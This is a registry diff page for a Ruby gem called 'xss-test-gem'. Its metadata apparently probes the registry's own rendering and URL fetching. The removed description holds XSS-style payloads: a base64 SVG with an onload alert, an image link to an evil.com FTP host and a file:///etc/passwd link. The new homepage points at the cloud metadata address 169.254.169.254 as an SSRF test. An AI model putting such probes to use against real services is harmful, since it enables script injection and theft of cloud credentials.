xss-test-gem 0.2.2 → 0.2.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of xss-test-gem might be problematic. Click here for more details.
- checksums.yaml +2 -2
- metadata +5 -11
checksums.yaml
CHANGED
|
@@ -1,4 +1,4 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 660c9de829b9f8872cb462061851ea8cf0a2abb921fb5b710f9e2b055744846b
|
|
4
|
+
data.tar.gz: 88bab5af62434f15a064243cd87521bbdab49552d91c213f9b33d1daa0fbfd50
|
metadata
CHANGED
|
@@ -1,25 +1,19 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: xss-test-gem
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.2.
|
|
4
|
+
version: 0.2.4
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Testing Buffalo
|
|
8
8
|
email: testingbuffalo@apexblack.org
|
|
9
|
-
homepage:
|
|
9
|
+
homepage: http://169.254.169.254/latest/meta-data/
|
|
10
10
|
licenses:
|
|
11
11
|
- MIT
|
|
12
|
-
summary:
|
|
12
|
+
summary: SSRF test gem
|
|
13
13
|
description: |
|
|
14
|
-
==
|
|
14
|
+
== SSRF Test Gem
|
|
15
15
|
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
SVG data URI: {image}[data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc+]
|
|
19
|
-
|
|
20
|
-
FTP image: {image}[ftp://evil.com/test.jpg]
|
|
21
|
-
|
|
22
|
-
File protocol: {image}[file:///etc/passwd]
|
|
16
|
+
Testing server-side URL fetching via gem homepage.
|
|
23
17
|
|
|
24
18
|
required_ruby_version: !ruby/object:Gem::Requirement
|
|
25
19
|
requirements:
|